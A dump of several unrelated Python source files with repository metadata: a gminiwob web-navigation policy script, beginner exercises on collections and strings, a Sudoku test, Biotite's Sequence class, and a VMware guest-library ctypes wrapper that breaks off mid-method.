"""Example execution of a rule-based optimal policy on gminiwob shopping."""
import time
from absl import app
from absl import flags
from absl import logging
from CoDE import test_websites
from CoDE import utils
from CoDE import vocabulary_node
from CoDE import web_environment
flags.DEFINE_string("data_dep_path", None,
"Data dep path for local miniwob files.")
flags.DEFINE_boolean(
"run_headless_mode", False,
"Run in headless mode. On borg, this should always be true.")
flags.DEFINE_boolean(
"use_conceptual", False,
"If true, use abstract web navigation where it is assumed to known which profile field corresponds to which element."
)
FLAGS = flags.FLAGS
def run_policy_on_shopping_website():
"""Run an optimal policy on the shopping website and visualize in browser."""
# Create a generic web environment to which we will add primitives and
# transitions to create a shopping website. These parameters will work to
# observe a simple policy running but they might be insufficient in a training
# setting as observations will be converted into arrays and these parameters
# are used to shape them. In this example, they don't have that effect.
env = web_environment.GMiniWoBWebEnvironment(
base_url="file://{}/".format(FLAGS.data_dep_path),
subdomain="gminiwob.generic_website",
profile_length=5,
number_of_fields=5,
use_only_profile_key=False,
number_of_dom_elements=150,
dom_attribute_sequence_length=5,
keyboard_action_size=5,
kwargs_dict={
"headless": FLAGS.run_headless_mode,
"threading": False
},
step_limit=25,
global_vocabulary=vocabulary_node.LockedVocabulary(),
use_conceptual=FLAGS.use_conceptual)
# Create a shopping website design with difficulty = 3.
website = test_websites.create_shopping_website(3)
design = test_websites.generate_website_design_from_created_website(
website)
# Design the actual environment.
env.design_environment(
design, auto_num_pages=True)
# Make sure raw_state=True as this will return raw observations not numpy
# arrays.
state = env.reset(raw_state=True)
# Optimal sequences of elements to visit. Some might be redundant and will be
# skipped.
optimal_actions = [
"group_next_p0",
"group_username",
"group_password",
"group_rememberme",
"group_captcha",
"group_stayloggedin",
"group_next_p1",
"group_next_p2",
"group_name_first",
"group_name_last",
"group_address_line1",
"group_address_line2",
"group_city",
"group_postal_code",
"group_state",
"group_submit_p2",
]
# Corresponding pages of these elements:
# [0, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3]
reward = 0.0
logging.info("Utterance: %s", str(state.utterance))
logging.info("\n\n")
logging.info("All available primitives: %s",
str(env.get_all_actionable_primitives()))
logging.info("\n\n")
# Iterate over all optimal actions. For each action, iterate over all elements
# in the current observation. If an element matches, execute the optimal
# action and continue.
# Iterate over optimal actions.
for action in optimal_actions:
logging.info("Element at focus: %s", str(action))
# Iterate over all elements in the current observation.
# order_dom_elements returns an ordered list of DOM elements to make the
# order and elements consistent.
for i, element in enumerate(
utils.order_dom_elements(state.dom_elements, html_id_prefix=None)):
# If HTML if of the element matches the action, execute the action.
if element.id == action.replace("group", "actionable"):
logging.info("Acting on (%s)", str(element))
logging.info("\tAttributes of the element: %s",
str(utils.dom_attributes(element, 5)))
# Get the corresponding profile fields.
profile_keys = env.raw_profile.keys
# Execute the (element index, profile field index) action on the
# website. Environment step function accepts a single scalar action.
# We flatten the action from a tuple to a scalar which is deflattened
# back to a tuple in the step function.
if action[len("group") +
1:] in profile_keys and not FLAGS.use_conceptual:
logging.info("Profile: %s, Element ID: %s",
str(profile_keys.index(action[len("group") + 1:])),
str(action[len("group") + 1:]))
# action=element_index + profile_field_index * number_of_elements
# This is converted back into a tuple using a simple modulo
# arithmetic.
state, r, _, _ = env.step(
i + profile_keys.index(action[len("group") + 1:]) *
env.number_of_dom_elements, True)
else: # This is the case where we have abstract navigation problem.
logging.info("Element ID: %s", str(action[len("group") + 1:]))
# We don't need to convert a tuple into a scalar because in this case
# the environment expects the index of the element.
state, r, _, _ = env.step(i, True)
logging.info("Current reward: %f", r)
reward += r
if not FLAGS.run_headless_mode:
# wait 1 sec so that the action can be observed on the browser.
time.sleep(1)
break
logging.info("Final reward: %f", reward)
if not FLAGS.run_headless_mode:
# wait 30 secs so that the users can inspect the html in the browser.
time.sleep(30)
def main(argv):
if len(argv) > 1:
raise app.UsageError("Too many command-line arguments.")
run_policy_on_shopping_website()
if __name__ == "__main__":
app.run(main)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
174aec0b7bfde27c24cc6abccfd345e1ef6dced6
|
48ac4b8138b490a876a2530dad1bca29f1823de5
|
/first_tests/colecciones.py
|
5c290b80eb83d6767835a388a0a42d158bb60b7a
|
[
"MIT"
] |
permissive
|
Gorwast/python-tests
|
dbb7222d6a3ccdc2de0d5ad90156f02a4ba69607
|
342605fdfa50d05c645e12c15b4db24d3f7cb7f0
|
refs/heads/master
| 2023-01-08T20:24:03.893124
| 2020-11-18T21:16:18
| 2020-11-18T21:16:18
| 272,347,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
py
|
#Collections: List
l1 = [22, True, "String", [4, 5]]
l2 = [15, 30, 45, 60]
var1 = l1[0]
print("List: ")
print(var1)
print(l2[3])
print(l2[0:2])
for elemento in l2:
print(elemento)
###Collections: Tupla
t1 = (10, False, 3.2, (2, 3))
print(type(t1))
print(type(l1))
var2 = t1[1]
print("Tuple: ")
print(t1[2])
print(var2)
###Colecciones: Diccionario
d1 = {'Name': 'Luis', 'Age': 21, 'Theme': 'Development'}
var3 = d1{'Age'}
print('Dictionary: ')
print()
|
[
"lk23@live.com.mx"
] |
lk23@live.com.mx
|
b235e47ceab2dde9ba3dcadac64258bc818f6667
|
0aa0c38985c11331b20e1d9bdeabfdcaf5dea90f
|
/ex10.py
|
c77558f62b5bebe437bd461e03d98e8d5357ebd7
|
[] |
no_license
|
dongul11/lpthw
|
5dd92278a35166e2b465aafd3e171ebc60cd4340
|
35c973e65820601b6231d001d100c06f02558adc
|
refs/heads/master
| 2021-09-22T10:06:14.775565
| 2018-09-07T17:28:43
| 2018-09-07T17:28:43
| 114,300,461
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
tabby_cat = "\tI'm tabbed in."
persian_cat = "I'm split\non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = '''
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
'''
print (tabby_cat)
print (persian_cat)
print(backslash_cat)
print(fat_cat)
|
[
"donguljack11@gmail.com"
] |
donguljack11@gmail.com
|
d7aac9af796fa2c15a1d847133e699fd19779ed9
|
63dc51b514faea7966d529440df80c4a6eab34b1
|
/src/test/TestLibSudoku.py
|
964c3f328a77ae5d348cff9cdca232b81d916c50
|
[] |
no_license
|
caviedes93/PySudoku
|
af1368dac2f0c374552710cc75132f6799b049f1
|
d67e110684526fe188436884ec51ecc89ad6c388
|
refs/heads/master
| 2020-12-25T10:59:20.442887
| 2013-07-27T22:58:19
| 2013-07-27T22:58:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
'''
Created on 26/07/2013
@author: dominik
'''
import unittest
from lib.libSudoku import get_new_board, is_board_valid
class Test(unittest.TestCase):
def testBoardCreationAndValidation(self):
for i in range(1,100):
newBoard = get_new_board()
self.assertTrue(is_board_valid(newBoard), "newly created board is not valid")
newBoard = get_new_board()
newBoard[0][0] = newBoard[2][2]
self.assertFalse(is_board_valid(newBoard), "invalid board deemed to be valid - group")
newBoard= get_new_board()
newBoard[0][8] = newBoard[0][0]
self.assertFalse(is_board_valid(newBoard), "invalid board deemd te be valid - row")
newBoard= get_new_board()
newBoard[8][8] = newBoard[0][8]
self.assertFalse(is_board_valid(newBoard), "invalid board deemd te be valid - col")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
[
"dominik@foop.at"
] |
dominik@foop.at
|
e0b15df612ba3b856357439a9d6586d0186b146e
|
c0c4fe8f9aff2e7684fcaf10329f963873753b2a
|
/src/biotite/sequence/sequence.py
|
1a6b8230a35cd5b6afd265692459ee224fe40473
|
[
"BSD-3-Clause"
] |
permissive
|
thomasnevolianis/biotite
|
85e1b9d6a1fbb5d9f81501a8ebc617bc26388ab9
|
916371eb602cfcacb2d5356659298ef38fa01fcc
|
refs/heads/master
| 2022-11-30T19:40:53.017368
| 2020-08-04T07:00:59
| 2020-08-04T07:00:59
| 285,375,415
| 0
| 0
|
BSD-3-Clause
| 2020-08-05T18:41:48
| 2020-08-05T18:41:47
| null |
UTF-8
|
Python
| false
| false
| 11,010
|
py
|
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
"""
The module contains the :class:`Sequence` superclass and :class:`GeneralSequence`.
"""
__name__ = "biotite.sequence"
__author__ = "Patrick Kunzmann"
__all__ = ["Sequence"]
import numbers
import abc
import numpy as np
from .alphabet import Alphabet, LetterAlphabet
from ..copyable import Copyable
_size_uint8 = np.iinfo(np.uint8 ).max +1
_size_uint16 = np.iinfo(np.uint16).max +1
_size_uint32 = np.iinfo(np.uint32).max +1
class Sequence(Copyable, metaclass=abc.ABCMeta):
"""
The abstract base class for all sequence types.
A :class:`Sequence` can be seen as a succession of symbols, that are
elements in the allowed set of symbols, the :class:`Alphabet`.
Internally, a :class:`Sequence` object uses a *NumPy*
:class:`ndarray` of integers, where each integer represents a
symbol.
The :class:`Alphabet` of a :class:`Sequence` object is used to
encode each symbol, that is used to create the
:class:`Sequence`, into an integer. These integer values are called
symbol code, the encoding of an entire sequence of symbols is
called sequence code.
The size of the symbol code type in the array is determined by the
size of the :class:`Alphabet`:
If the :class:`Alphabet` contains 256 symbols or less, one byte is
used per array element; if the :class:`Alphabet` contains
between 257 and 65536 symbols, two bytes are used, and so on.
Two :class:`Sequence` objects are equal if they are instances of the
same class, have the same :class:`Alphabet` and have equal sequence
codes.
Comparison with a string or list of symbols evaluates always to
false.
A :class:`Sequence` can be indexed by any 1-D index a
:class:`ndarray` accepts.
If the index is a single integer, the decoded symbol at that
position is returned, otherwise a subsequence is returned.
Individual symbols of the sequence can also be exchanged in indexed
form: If the an integer is used as index, the item is treated as a
symbol. Any other index (slice, index list, boolean mask) expects
multiple symbols, either as list of symbols, as :class:`ndarray`
containing a sequence code or another :class:`Sequence` instance.
Concatenation of two sequences is achieved with the '+' operator.
Each subclass of :class:`Sequence` needs to overwrite the abstract
method :func:`get_alphabet()`, which specifies the alphabet the
:class:`Sequence` uses.
Parameters
----------
sequence : iterable object, optional
The symbol sequence, the :class:`Sequence` is initialized with.
For alphabets containing single letter strings, this parameter
may also be a :class`str` object.
By default the sequence is empty.
Attributes
----------
code : ndarray
The sequence code.
symbols : list
The list of symbols, represented by the sequence.
The list is generated by decoding the sequence code, when
this attribute is accessed. When this attribute is modified,
the new list of symbols is encoded into the sequence code.
alphabet : Alphabet
The alphabet of this sequence. Cannot be set.
Equal to `get_alphabet()`.
Examples
--------
Creating a DNA sequence from string and print the symbols and the
code:
>>> dna_seq = NucleotideSequence("ACGTA")
>>> print(dna_seq)
ACGTA
>>> print(dna_seq.code)
[0 1 2 3 0]
>>> print(dna_seq.symbols)
['A' 'C' 'G' 'T' 'A']
>>> print(list(dna_seq))
['A', 'C', 'G', 'T', 'A']
Sequence indexing:
>>> print(dna_seq[1:3])
CG
>>> print(dna_seq[[0,2,4]])
AGA
>>> print(dna_seq[np.array([False,False,True,True,True])])
GTA
Sequence manipulation:
>>> dna_copy = dna_seq.copy()
>>> dna_copy[2] = "C"
>>> print(dna_copy)
ACCTA
>>> dna_copy = dna_seq.copy()
>>> dna_copy[0:2] = dna_copy[3:5]
>>> print(dna_copy)
TAGTA
>>> dna_copy = dna_seq.copy()
>>> dna_copy[np.array([True,False,False,False,True])] = "T"
>>> print(dna_copy)
TCGTT
>>> dna_copy = dna_seq.copy()
>>> dna_copy[1:4] = np.array([0,1,2])
>>> print(dna_copy)
AACGA
Reverse sequence:
>>> dna_seq_rev = dna_seq.reverse()
>>> print(dna_seq_rev)
ATGCA
Concatenate the two sequences:
>>> dna_seq_concat = dna_seq + dna_seq_rev
>>> print(dna_seq_concat)
ACGTAATGCA
"""
def __init__(self, sequence=()):
self.symbols = sequence
def copy(self, new_seq_code=None):
"""
Copy the object.
Parameters
----------
new_seq_code : ndarray, optional
If this parameter is set, the sequence code is set to this
value, rather than the original sequence code.
Returns
-------
copy
A copy of this object.
"""
# Override in order to achieve better performance,
# in case only a subsequence is needed,
# because not the entire sequence code is copied then
clone = self.__copy_create__()
if new_seq_code is None:
clone.code = np.copy(self.code)
else:
clone.code = new_seq_code
self.__copy_fill__(clone)
return clone
@property
def symbols(self):
return self.get_alphabet().decode_multiple(self.code)
@symbols.setter
def symbols(self, value):
alph = self.get_alphabet()
dtype = Sequence._dtype(len(alph))
self._seq_code = alph.encode_multiple(value, dtype)
@property
def code(self):
return self._seq_code
@code.setter
def code(self, value):
dtype = Sequence._dtype(len(self.get_alphabet()))
if not isinstance(value, np.ndarray):
raise TypeError("Sequence code must be an integer ndarray")
self._seq_code = value.astype(dtype, copy=False)
@property
def alphabet(self):
return self.get_alphabet()
@abc.abstractmethod
def get_alphabet(self):
"""
Get the :class:`Alphabet` of the :class:`Sequence`.
This method must be overwritten, when subclassing
:class:`Sequence`.
Returns
-------
alphabet : Alphabet
:class:`Sequence` alphabet.
"""
pass
def reverse(self):
"""
Reverse the :class:`Sequence`.
Returns
-------
reversed : Sequence
The reversed :class:`Sequence`.
Examples
--------
>>> dna_seq = NucleotideSequence("ACGTA")
>>> dna_seq_rev = dna_seq.reverse()
>>> print(dna_seq_rev)
ATGCA
"""
reversed_code = np.flip(np.copy(self._seq_code), axis=0)
reversed = self.copy(reversed_code)
return reversed
def is_valid(self):
"""
Check, if the sequence contains a valid sequence code.
A sequence code is valid, if at each sequence position the
code is smaller than the size of the alphabet.
Invalid code means that the code cannot be decoded into
symbols. Furthermore invalid code can lead to serious
errors in alignments, since the substitution matrix
is indexed with an invalid index.
Returns
-------
valid : bool
True, if the sequence is valid, false otherwise.
"""
return (self.code < len(self.get_alphabet())).all()
def get_symbol_frequency(self):
"""
Get the number of occurences of each symbol in the sequence.
If a symbol does not occur in the sequence, but it is in the
alphabet, its number of occurences is 0.
Returns
-------
frequency : dict
A dictionary containing the symbols as keys and the
corresponding number of occurences in the sequence as
values.
"""
frequencies = {}
for code, symbol in enumerate(self.get_alphabet()):
frequencies[symbol] = len(np.nonzero((self._seq_code == code))[0])
return frequencies
def __getitem__(self, index):
alph = self.get_alphabet()
sub_seq = self._seq_code.__getitem__(index)
if isinstance(sub_seq, np.ndarray):
return self.copy(sub_seq)
else:
return alph.decode(sub_seq)
def __setitem__(self, index, item):
alph = self.get_alphabet()
if isinstance(index, numbers.Integral):
# Expect a single symbol
code = alph.encode(item)
else:
# Expect multiple symbols
if isinstance(item, Sequence):
code = item.code
elif isinstance(item, np.ndarray):
code = item
else:
# Default: item is iterable object of symbols
code = alph.encode_multiple(item)
self._seq_code.__setitem__(index, code)
def __len__(self):
return len(self._seq_code)
def __iter__(self):
alph = self.get_alphabet()
i = 0
while i < len(self):
yield alph.decode(self._seq_code[i])
i += 1
def __eq__(self, item):
if not isinstance(item, type(self)):
return False
if self.get_alphabet() != item.get_alphabet():
return False
return np.array_equal(self._seq_code, item._seq_code)
def __str__(self):
alph = self.get_alphabet()
if isinstance(alph, LetterAlphabet):
return alph.decode_multiple(self._seq_code, as_bytes=True)\
.tobytes().decode("ASCII")
else:
return "".join(alph.decode_multiple(self._seq_code))
def __add__(self, sequence):
if self.get_alphabet().extends(sequence.get_alphabet()):
new_code = np.concatenate((self._seq_code, sequence._seq_code))
new_seq = self.copy(new_code)
return new_seq
elif sequence.get_alphabet().extends(self.get_alphabet()):
new_code = np.concatenate((self._seq_code, sequence._seq_code))
new_seq = sequence.copy(new_code)
return new_seq
else:
raise ValueError("The sequences alphabets are not compatible")
@staticmethod
def _dtype(alphabet_size):
if alphabet_size <= _size_uint8:
return np.uint8
elif alphabet_size <= _size_uint16:
return np.uint16
elif alphabet_size <= _size_uint32:
return np.uint32
else:
return np.uint64
|
[
"patrick.kunzm@gmail.com"
] |
patrick.kunzm@gmail.com
|
9bdfba61deccc4c6699bd54280a7728fb4b4069a
|
9612c53a9e666ba10510962a833a55fb7553be7b
|
/getDataSafir/jsonToCsv.py
|
6a2c199030293c790470a6ac6c375484ec09da6f
|
[] |
no_license
|
raksmeyny/big-data
|
04098ed6fc6c51e9643c2dba0ee30f4c38d143ce
|
1222edd5ca59a3d04ad3ac4dd444bea4cfd727e6
|
refs/heads/master
| 2021-01-10T04:53:57.905212
| 2016-03-14T04:15:14
| 2016-03-14T04:15:14
| 52,132,443
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
import csv
import json
with open('comment.json') as x:
x = json.load(x)
print x
with open('data.csv','a') as f:
csvfile=csv.writer(f)
for item in x:
csvfile.writerow([item["date"],item["comment"],item["link"],item["likes"]]);
# f = csv.writer(open("comment.csv", "w+"))
# f.writerow(["date", "comment", "link", "likes"])
# for x in x:
# f.writerow([x["date"],
# x["comment"],
# x["link"],
# x["likes"]])
|
[
"raksmey.ny"
] |
raksmey.ny
|
8c5ffaaa66db4fcbb98cfd663e36037edaa8163a
|
abaa806550f6e6e7bcdf71b9ec23e09a85fe14fd
|
/data/global-configuration/packs/vmware/collectors/vmguestlib.py
|
eb9e2dabd67d95667afa30dc59ee76accdf5f3c7
|
[
"MIT"
] |
permissive
|
naparuba/opsbro
|
02809ddfe22964cd5983c60c1325c965e8b02adf
|
98618a002cd47250d21e7b877a24448fc95fec80
|
refs/heads/master
| 2023-04-16T08:29:31.143781
| 2019-05-15T12:56:11
| 2019-05-15T12:56:11
| 31,333,676
| 34
| 7
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,971
|
py
|
### This program is free software; you can redistribute it and/or
### modify it under the terms of the GNU General Public License
### as published by the Free Software Foundation; either version 2
### of the License, or (at your option) any later version.
###
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
###
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
### Copyright 2013-2014 Dag Wieers <dag@wieers.com>
from ctypes import *
from ctypes.util import find_library
__author__ = 'Dag Wieers <dag@wieers.com>'
__version__ = '0.1.2'
__version_info__ = tuple([int(d) for d in __version__.split('.')])
__license__ = 'GNU General Public License (GPL)'
# TODO: Implement support for Windows and MacOSX, improve Linux support ?
if find_library('vmGuestLib'):
vmGuestLib = CDLL(find_library('vmGuestLib'))
elif find_library('guestlib'):
vmGuestLib = CDLL(find_library('guestlib'))
# elif os.path.exists('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so'):
# vmGuestLib = CDLL('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so')
# elif os.path.exists('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll'):
# vmGuestLib = CDLL('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll')
else:
raise Exception, 'ERROR: Cannot find vmGuestLib library in LD_LIBRARY_PATH'
VMGUESTLIB_ERROR_SUCCESS = 0
VMGUESTLIB_ERROR_OTHER = 1
VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM = 2
VMGUESTLIB_ERROR_NOT_ENABLED = 3
VMGUESTLIB_ERROR_NOT_AVAILABLE = 4
VMGUESTLIB_ERROR_NO_INFO = 5
VMGUESTLIB_ERROR_MEMORY = 6
VMGUESTLIB_ERROR_BUFFER_TOO_SMALL = 7
VMGUESTLIB_ERROR_INVALID_HANDLE = 8
VMGUESTLIB_ERROR_INVALID_ARG = 9
VMGUESTLIB_ERROR_UNSUPPORTED_VERSION = 10
VMErrors = (
'VMGUESTLIB_ERROR_SUCCESS',
'VMGUESTLIB_ERROR_OTHER',
'VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM',
'VMGUESTLIB_ERROR_NOT_ENABLED',
'VMGUESTLIB_ERROR_NOT_AVAILABLE',
'VMGUESTLIB_ERROR_NO_INFO',
'VMGUESTLIB_ERROR_MEMORY',
'VMGUESTLIB_ERROR_BUFFER_TOO_SMALL',
'VMGUESTLIB_ERROR_INVALID_HANDLE',
'VMGUESTLIB_ERROR_INVALID_ARG',
'VMGUESTLIB_ERROR_UNSUPPORTED_VERSION',
)
VMErrMsgs = (
'The function has completed successfully.',
'An error has occurred. No additional information about the type of error is available.',
'The program making this call is not running on a VMware virtual machine.',
'The vSphere Guest API is not enabled on this host, so these functions cannot be used. For information about how to enable the library, see "Context Functions" on page 9.',
'The information requested is not available on this host.',
'The handle data structure does not contain any information. You must call VMGuestLib_UpdateInfo to update the data structure.',
'There is not enough memory available to complete the call.',
'The buffer is too small to accommodate the function call. For example, when you call VMGuestLib_GetResourcePoolPath, if the path buffer is too small for the resulting resource pool path, the function returns this error. To resolve this error, allocate a larger buffer.',
'The handle that you used is invalid. Make sure that you have the correct handle and that it is open. It might be necessary to create a new handle using VMGuestLib_OpenHandle.',
'One or more of the arguments passed to the function were invalid.',
'The host does not support the requested statistic.',
)
class VMGuestLibException(Exception):
'''Status code that indicates success orfailure. Each function returns a
VMGuestLibError code. For information about specific error codes, see "vSphere
Guest API Error Codes" on page 15. VMGuestLibError is an enumerated type
defined in vmGuestLib.h.'''
def __init__(self, errno):
self.errno = errno
self.GetErrorText = vmGuestLib.VMGuestLib_GetErrorText
self.GetErrorText.restype = c_char_p
self.message = self.GetErrorText(self.errno)
self.strerr = VMErrMsgs[self.errno]
def __str__(self):
return '%s\n%s' % (self.message, self.strerr)
class VMGuestLib(Structure):
def __init__(self):
# Reference to virtualmachinedata. VMGuestLibHandle is defined in vmGuestLib.h.
self.handle = self.OpenHandle()
self.UpdateInfo()
# Unique identifier for a session. The session ID changes after a virtual machine is
# migrated using VMotion, suspended and resumed, or reverted to a snapshot. Any of
# these events is likely to render any information retrieved with this API invalid. You
# can use the session ID to detect those events and react accordingly. For example, you
# can refresh and reset any state that relies on the validity of previously retrieved
# information.
# Use VMGuestLib_GetSessionId to obtain a valid session ID. A session ID is
# opaque. You cannot compare a virtual machine session ID with the session IDs from
# any other virtual machines. You must always call VMGuestLib_GetSessionId after
# calling VMGuestLib_UpdateInfo.
# VMSessionID is defined in vmSessionId.h
self.sid = self.GetSessionId()
def OpenHandle(self):
'''Gets a handle for use with other vSphere Guest API functions. The guest library
handle provides a context for accessing information about the virtual machine.
Virtual machine statistics and state data are associated with a particular guest library
handle, so using one handle does not affect the data associated with another handle.'''
if hasattr(self, 'handle'):
return self.handle
else:
handle = c_void_p()
ret = vmGuestLib.VMGuestLib_OpenHandle(byref(handle))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return handle
def CloseHandle(self):
'''Releases a handle acquired with VMGuestLib_OpenHandle'''
if hasattr(self, 'handle'):
ret = vmGuestLib.VMGuestLib_CloseHandle(self.handle.value)
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
del (self.handle)
def UpdateInfo(self):
'''Updates information about the virtual machine. This information is associated with
the VMGuestLibHandle.
VMGuestLib_UpdateInfo requires similar CPU resources to a system call and
therefore can affect performance. If you are concerned about performance, minimize
the number of calls to VMGuestLib_UpdateInfo.
If your program uses multiple threads, each thread must use a different handle.
Otherwise, you must implement a locking scheme around update calls. The vSphere
Guest API does not implement internal locking around access with a handle.'''
ret = vmGuestLib.VMGuestLib_UpdateInfo(self.handle.value)
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
def GetSessionId(self):
'''Retrieves the VMSessionID for the current session. Call this function after calling
VMGuestLib_UpdateInfo. If VMGuestLib_UpdateInfo has never been called,
VMGuestLib_GetSessionId returns VMGUESTLIB_ERROR_NO_INFO.'''
sid = c_void_p()
ret = vmGuestLib.VMGuestLib_GetSessionId(self.handle.value, byref(sid))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return sid
def GetCpuLimitMHz(self):
'''Retrieves the upperlimit of processor use in MHz available to the virtual
machine. For information about setting the CPU limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuLimitMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuReservationMHz(self):
'''Retrieves the minimum processing power in MHz reserved for the virtual
machine. For information about setting a CPU reservation, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuReservationMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuShares(self):
'''Retrieves the number of CPU shares allocated to the virtual machine. For
information about how an ESX server uses CPU shares to manage virtual
machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuStolenMs(self):
'''Retrieves the number of milliseconds that the virtual machine was in a
ready state (able to transition to a run state), but was not scheduled to run.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuStolenMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuUsedMs(self):
'''Retrieves the number of milliseconds during which the virtual machine
has used the CPU. This value includes the time used by the guest
operating system and the time used by virtualization code for tasks for this
virtual machine. You can combine this value with the elapsed time
(VMGuestLib_GetElapsedMs) to estimate the effective virtual machine
CPU speed. This value is a subset of elapsedMs.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetElapsedMs(self):
'''Retrieves the number of milliseconds that have passed in the virtual
machine since it last started running on the server. The count of elapsed
time restarts each time the virtual machine is powered on, resumed, or
migrated using VMotion. This value counts milliseconds, regardless of
whether the virtual machine is using processing power during that time.
You can combine this value with the CPU time used by the virtual machine
(VMGuestLib_GetCpuUsedMs) to estimate the effective virtual machine
CPU speed. cpuUsedMs is a subset of this value.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetElapsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostCpuUsedMs(self):
'''Undocumented.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetHostCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemKernOvhdMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemKernOvhdMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemMappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysFreeMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysFreeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSharedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUnmappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUnmappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUsedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostNumCpuCores(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostNumCpuCores(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetHostProcessorSpeed(self):
'''Retrieves the speed of the ESX system's physical CPU in MHz.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostProcessorSpeed(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemActiveMB(self):
